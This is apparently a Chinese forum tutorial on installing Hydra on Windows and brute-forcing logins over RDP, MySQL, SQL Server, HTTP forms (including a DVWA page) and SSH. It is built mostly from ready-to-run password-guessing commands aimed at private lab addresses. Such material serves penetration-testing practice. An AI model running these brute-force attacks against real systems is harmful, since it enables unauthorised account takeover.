解压安装即可,然后使用命令行(cmd)切到安装目录,例如:cd D:\thc-hydra-windows-master>
然后输入hydra.exe回车,出现以下提示说明安装成功。(注意:以后使用hydra都要切到安装目录才可以使用)
hydra -L 账户字典
-l 单个账户名
-p 单个密码
-P 密码字典
hydra爆破rdp:(前提是目标的远程连接可以访问)
hydra -l Administrator -P password.txt rdp://192.168.1.111
hydra爆破mysql:(前提是目标的mysql可远程访问)
hydra -l root -P password.txt 192.168.1.111 mysql
hydra爆破sql server:(前提是目标的mysql可远程访问)
hydra -l sa -P password.txt 192.168.1.111 mssql
hydra爆破http:( http-get or http-form-post.)
hydra -l admin -P password.txt 192.168.1.111 http-get /login.php
hydra -l admin -P password.txt 192.168.213.135 http-form-post "/dvwa/login.php:user=^USER^&pass=^PASS^:<title>invalide</title"
【注】(user,pass改为账户密码提交表单<label for="">的值)
hydra爆破ssh:( 前提是目标的远程连接可以访问)
hydra -l root -P password.txt 192.168.1.111 ssh
注意事项:
1、字典路径为全英文且不能空格;
2、做测试的时候要确保目标可访问;
3、所有符号均为英文状态下输入;
持续更新中...
为中国网络安全做出贡献。
发表于 2022-5-10 19:37:13
